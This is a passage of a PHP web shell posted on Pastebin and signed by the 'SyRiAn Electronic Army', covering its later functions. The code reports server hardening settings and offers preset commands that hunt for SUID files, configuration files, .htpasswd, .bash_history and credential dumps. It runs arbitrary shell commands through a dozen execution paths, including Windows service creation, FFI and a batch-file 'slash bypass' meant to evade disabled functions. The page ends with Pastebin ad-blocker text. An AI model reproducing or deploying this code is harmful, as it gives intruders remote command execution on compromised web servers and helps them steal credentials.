  732.     if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
  733.     else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
  734. }
  735. function MySQL2() {
  736.     $mysql_try = function_exists('mysql_connect');
  737.     if($mysql_try){$mysql = '<font color="red">ON</font>';}
  738.     else {$mysql = '<font color="green">OFF</font>';}return $mysql;
  739. }
  740. function MSQL() {
  741.     if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
  742.     else {$mSql = '<font color="green">OFF</font>';}return $mSql;
  743. }
  744. function MysqlI() {
  745.     if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
  746.     else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
  747. }
  748. function Gzip() {
  749.     if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
  750.     else {$gzip = '<font color="green">OFF</font>';}return $gzip;
  751. }
  752. function openBaseDir() {
  753.     $openBaseDir = ini_get("open_basedir");
  754.     if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
  755.     else {$openBaseDir = '<font color="red">ON</font>';}   
  756.     return $openBaseDir;
  757. }
  758. function Curl() {
  759.     if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
  760.     else{$curl = '<font color="green">OFF</font>';}return $curl;
  761. }
  762. function magicQouts() {
  763.     if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
  764.     if (empty($mag)){$mag = '<font color="green">OFF</font>';}
  765.     else {$mag= '<font color="red">ON</font>';}return $mag;
  766. }
  767. function SafeMode() {
  768.     $safe_mode = ini_get("safe_mode");
  769.     if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
  770.     else {$safe_mode = '<font color="red">ON</font>';}
  771.     return $safe_mode;
  772. }
  773. function DisableFunctions() {
  774.     $disfun = ini_get('disable_functions');
  775.     if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
  776. }
  777. function RegisterGlobals() {
  778.     if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
  779.     else{$registerg= '<font color="green">OFF</font>';}return $registerg;
  780. }
  781. function GetRealIP() {
  782.     if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
  783.     elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
  784.     else {$ip=getenv(REMOTE_ADDR);}
  785.     return $ip;
  786. }
  787. function SelectCommand($os) {
  788.     global $os;
  789.     if($os == 'Windows') {
  790.         echo "
  791.         <select name='alias' id='alias' onChange='AddAlias();' >
  792.         <option value=''>NONE</option> 
  793.         <option value='dir' >List Directory</option>
  794.         <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
  795.         <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;  &nbsp;</option>
  796.         <option value='netstat -an'>Show active connections</option>
  797.         <option value='net start'>Show running services</option>
  798.         <option value='tasklist'>Show Pro</option>
  799.         <option value='net user'>User accounts</option>
  800.         <option value='net view'>Show computers</option>
  801.         <option value='arp -a'>ARP Table</option>
  802.         <option value='ipconfig /all'>IP Configuration</option>
  803.         <option value='netstat -an'>netstat -an</option>
  804.         <option value='systeminfo'>System Informations</option>
  805.         <option value='getmac'>Get Mac Address</option>
  806.         </select>
  807.         ";
  808.     }
  809.     else {
  810.         echo "
  811.         <select name='alias' id='alias' onChange='AddAlias();' >
  812.         <option value=''>NONE</option> 
  813.         <option value='ls -la'>List dir</option>
  814.         <option value='cat /etc/hosts'>IP Addresses</option>
  815.         <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
  816.         <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
  817.         <option value='netstat -an | grep -i listen'>show opened ports</option>
  818.         <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
  819.         <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
  820.         <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
  821.         <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
  822.         <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
  823.         <option value='find / -type f -name \"config*\"'>find config* files</option>
  824.         <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
  825.         <option value='find / -perm -2 -ls'>find all writable folders and files</option>
  826.         <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
  827.         <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
  828.         <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
  829.         <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
  830.         <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
  831.         <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
  832.         <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
  833.         <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
  834.         <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
  835.         <option value='locate httpd.conf'>locate httpd.conf files</option>
  836.         <option value='locate vhosts.conf'>locate vhosts.conf files</option>
  837.         <option value='locate proftpd.conf'>locate proftpd.conf files</option>
  838.         <option value='locate psybnc.conf'>locate psybnc.conf files</option>
  839.         <option value='locate my.conf'>locate my.conf files</option>
  840.         <option value='locate admin.php'>locate admin.php files</option>
  841.         <option value='locate cfg.php'>locate cfg.php files</option>
  842.         <option value='locate conf.php'>locate conf.php files</option>
  843.         <option value='locate config.dat'>locate config.dat files</option>
  844.         <option value='locate config.php'>locate config.php files</option>
  845.         <option value='locate config.inc'>locate config.inc files</option>
  846.         <option value='locate config.inc.php'>locate config.inc.php</option>
  847.         <option value='locate config.default.php'>locate config.default.php files</option>
  848.         <option value='locate config'>locate config* files </option>
  849.         <option value='locate \".conf\"'>locate .conf files</option>
  850.         <option value='locate \".pwd\"'>locate .pwd files</option>
  851.         <option value='locate \".sql\"'>locate .sql files</option>
  852.         <option value='locate \".htpasswd\"'>locate .htpasswd files</option>
  853.         <option value='locate \".bash_history\"'>locate .bash_history files</option>
  854.         <option value='locate \".mysql_history\"'>locate .mysql_history files</option>
  855.         <option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
  856.         <option value='locate backup'>locate backup files</option>
  857.         <option value='locate dump'>locate dump files</option>
  858.         <option value='locate priv'>locate priv files</option>
  859.         </select>
  860.         ";
  861.     }
  862. }
  863. function CSS($sh3llColor) {
  864.     $css =  "
  865.     <style>
  866.     BODY
  867.     {
  868.         FONT-FAMILY: Verdana;
  869.         margin: 2;
  870.         background-color: #000000;
  871.         color:white;
  872.         font-size:10pt;
  873.     }
  874.     sy  
  875.     {
  876.         color:".$sh3llColor.";
  877.         font-size:7pt;
  878.     }
  879.     #Box
  880.     {
  881.         color:".$sh3llColor.";
  882.         background-color:#000;
  883.         font-size:14px;
  884.         font-weight:bold;
  885.  
  886.         border:none;
  887.     }
  888.     table
  889.     {
  890.         border:none;
  891.         BORDER:  #eeeeee  outset;
  892.         BACKGROUND-COLOR: #000000;
  893.         color: #cccccc;
  894.         font-size:10px;
  895.     }
  896.     tr
  897.     {
  898.         BORDER-RIGHT:  #cccccc 1px solid;
  899.         BORDER-TOP:    #cccccc 1px solid;
  900.         BORDER-LEFT:   #cccccc 1px solid;
  901.         BORDER-BOTTOM: #cccccc 1px solid;
  902.         color: #ffffff;
  903.     }
  904.     td
  905.     {
  906.         BORDER-RIGHT:  #cccccc 1px solid;
  907.         BORDER-TOP:    #cccccc 1px solid;
  908.         BORDER-LEFT:   #cccccc 1px solid;
  909.         BORDER-BOTTOM: #cccccc 1px solid;
  910.         color: #cccccc;
  911.     }
  912.  
  913.     input
  914.     {
  915.         BORDER-RIGHT:  ".$sh3llColor." 1px solid;
  916.         BORDER-TOP:    ".$sh3llColor." 1px solid;
  917.         BORDER-LEFT:   ".$sh3llColor." 1px solid;
  918.         BORDER-BOTTOM: ".$sh3llColor." 1px solid;
  919.         BACKGROUND-COLOR: #333333;
  920.         font: 9pt tahoma;
  921.         color: #ffffff;
  922.     }
  923.     select
  924.     {
  925.         BORDER-RIGHT:  #ffffff 1px solid;
  926.         BORDER-TOP:    #999999 1px solid;
  927.         BORDER-LEFT:   #999999 1px solid;
  928.         BORDER-BOTTOM: #ffffff 1px solid;
  929.         BACKGROUND-COLOR: #000000;
  930.         font: 9pt tahoma;
  931.         color: #CCCCCC;;
  932.     }
  933.     submit
  934.     {
  935.         BORDER:  1px outset buttonhighlight;
  936.         BACKGROUND-COLOR: #272727;
  937.         width: 40%;
  938.         color: #cccccc;
  939.     }
  940.     textarea
  941.     {
  942.         BORDER-RIGHT:  #ffffff 1px solid;
  943.         BORDER-TOP:    #999999 1px solid;
  944.         BORDER-LEFT:   #999999 1px solid;
  945.         BORDER-BOTTOM: #ffffff 1px solid;
  946.         BACKGROUND-COLOR: #333333;
  947.         color: #ffffff;
  948.     }
  949.     .Save{
  950.         width:500px;   
  951.         border-color:red;
  952.     }
  953.     A:link {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  954.     A:visited { COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  955.     A:active {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
  956.     A:hover {color:blue;TEXT-DECORATION: none;}
  957.     </style>
  958.     <script>
  959.     function openPHPInfo(){my_window= window.open (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\");    }
  960.     function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
  961.     function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>';    }
  962.     function change_dir_mode() {
  963.         var dir_mode = document.getElementById('dir_mode').value;
  964.         document.location = '?dir_mode='+dir_mode;
  965.     }
  966.     </script>
  967.     ";
  968.     return $css;
  969. }
  970. function filter($string) {
  971.     if(get_magic_quotes_gpc() != 0){return stripslashes($string);   }
  972.     else{return $string;    }
  973. }
  974. function footer() {
  975.     echo '
  976.     <table width="100%">
  977.     <tr>
  978.     <td width="100%"><center>
  979.     <sy>  ~~<< </sy>SyRiAn Electronic Army<sy> >>~~</sy></b><br/>
  980.     <sy>  ~~<< </sy><a href="http://www.syrian-es.com" target="_blank">www.syrian-es.com</a><sy> >>~~</sy></b><br />
  981.     <sy>  ~~<< </sy>sea.coders@hotmail.com<sy> >>~~</sy></b>
  982.     </center></td>
  983.     </tr>
  984.     </table>
  985.     </body></html>
  986.     ';
  987. }
  988. function print_exe_method() {
  989.     global $os; global $exec_method;
  990.     if($os == "Linux") {
  991.         ?>
  992.         <select name="exe_method" >
  993.             <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  994.             <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
  995.             <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
  996.             <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  997.             <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  998.             <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  999.             <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  1000.             <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  1001.         </select>
  1002.         <?php
  1003.     } else {
  1004.         ?>
  1005.         <select name="exe_method" >
  1006.             <option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
  1007.             <option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
  1008.             <option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
  1009.             <option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
  1010.             <option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
  1011.             <option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
  1012.             <option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
  1013.             <option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
  1014.             <option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
  1015.             <option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
  1016.             <option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
  1017.             <option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
  1018.         </select>
  1019.         <?php
  1020.     }
  1021. }
  1022. function Exe($command) {
  1023.     global $dir;global $os;global $exec_method;
  1024.     $command = filter($command);
  1025.    
  1026.     if($exec_method == "exec") {
  1027.         exec($command,$output);echo join("\n",$output);
  1028.     } else if($exec_method == "system") {
  1029.         system($command);
  1030.     } else if($exec_method == "shell_exec") {
  1031.         echo shell_exec($command);
  1032.     } else if($exec_method == "passthru") {
  1033.         passthru($command);
  1034.     } else if($exec_method == "proc_open") {
  1035.         echo proc_exec($command,$dir);
  1036.     } else if($exec_method == "popen") {
  1037.         $fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
  1038.     } else if($exec_method == "win_shell_execute") {
  1039.         echo winshell($command);
  1040.     } else if($exec_method == "win32_create_service") {
  1041.         echo srvshell($command);
  1042.     } else if($exec_method == "ffi") {
  1043.         echo ffishell($command);
  1044.     } else if($exec_method == "perl") {
  1045.         echo perlshell($command);
  1046.     } else if($exec_method == "python") {
  1047.         echo python_eval("import os\nos.system('".$command."')");
  1048.     } else if($exec_method == "slash_bypass") {
  1049.         echo slashBypass($command);
  1050.     }
  1051. }
  1052. function proc_exec($com , $dir) {
  1053.     $start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
  1054.     $process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
  1055.     return stream_get_contents($pipes[1]);
  1056. }
  1057. function winshell($command) {
  1058.     $name=whereistmP()."\\".uniqid('NJ');
  1059.     win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
  1060.     sleep(1);
  1061.     $exec=file_get_contents($name);
  1062.     DeleteFile($name);
  1063.     return $exec;
  1064. }
  1065. function srvshell($command) {
  1066.     $name=whereistmP()."\\".uniqid('NJ');
  1067.     $n=uniqid('NJ');
  1068.     $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
  1069.     win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
  1070.     win32_start_service($n);
  1071.     win32_stop_service($n);
  1072.     win32_delete_service($n);
  1073.     while(!file_exists($name))sleep(1);
  1074.     $exec=file_get_contents($name);
  1075.     DeleteFile($name);
  1076.     return $exec;
  1077. }
  1078. function ffishell($command) {
  1079.     $name=whereistmP()."\\".uniqid('NJ');
  1080.     $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  1081.     $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
  1082.     while(!file_exists($name))sleep(1);
  1083.     $exec=file_get_contents($name);
  1084.     DeleteFile($name);
  1085.     return $exec;
  1086. }
  1087. function perlshell($command) {
  1088.     $perl=new perl();
  1089.     ob_start();
  1090.     $perl->eval("system('".$command."')");
  1091.     $exec=ob_get_contents();
  1092.     ob_end_clean();
  1093.     return $exec;
  1094. }
  1095. function slashBypass($cmd) {
  1096.     GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
  1097.     exec("\start cmd.bat");
  1098.     $content = file_get_contents('sy3.txt');
  1099.     unlink('sy3.txt');
  1100.     return $content;
  1101. }
  1102. function GenerateFile($name,$content) {
  1103.     if(function_exists('fopen') && function_exists('fclose')) {
  1104.         $file = fopen($name,"w+");
  1105.         if($file) {
  1106.             if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }   
  1107.             else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
  1108.             else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
  1109.             if(!$writeFile){return false;}
  1110.         }
  1111.         else{return false;}fclose($file);return true;
  1112.     }
  1113. }
  1114. function ScanDirs() {
  1115.     global $os; global $dir;global $safeMode;global $dir_mode;
  1116.     if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
  1117.     else {
  1118.         $result .= "Perms   Size    Time        Owner/Group R/W Type    File
  1119. -----------------------------------------------------------------------------
  1120. ";
  1121.         $handel = opendir($dir);
  1122.         while(($file = readdir($handel))!= false)
  1123.         {
  1124.             $size = filesize($file);
  1125.             if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
  1126.             if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
  1127.             if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
  1128.             $perms = fileperms($file);
  1129.             $time = date("y/m/d", filectime($file));
  1130.             if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
  1131.             if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
  1132.             $result .= $perms." ".$size."   ".$time."   ".$owner."/".$group."   ".$isReadable."/".$isWritable." ".$type."   ".$file."
  1133. ";
  1134.         }
  1135.     }
  1136.     return $result;
  1137. }
  1138. echo footer();
  1139. ?>
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×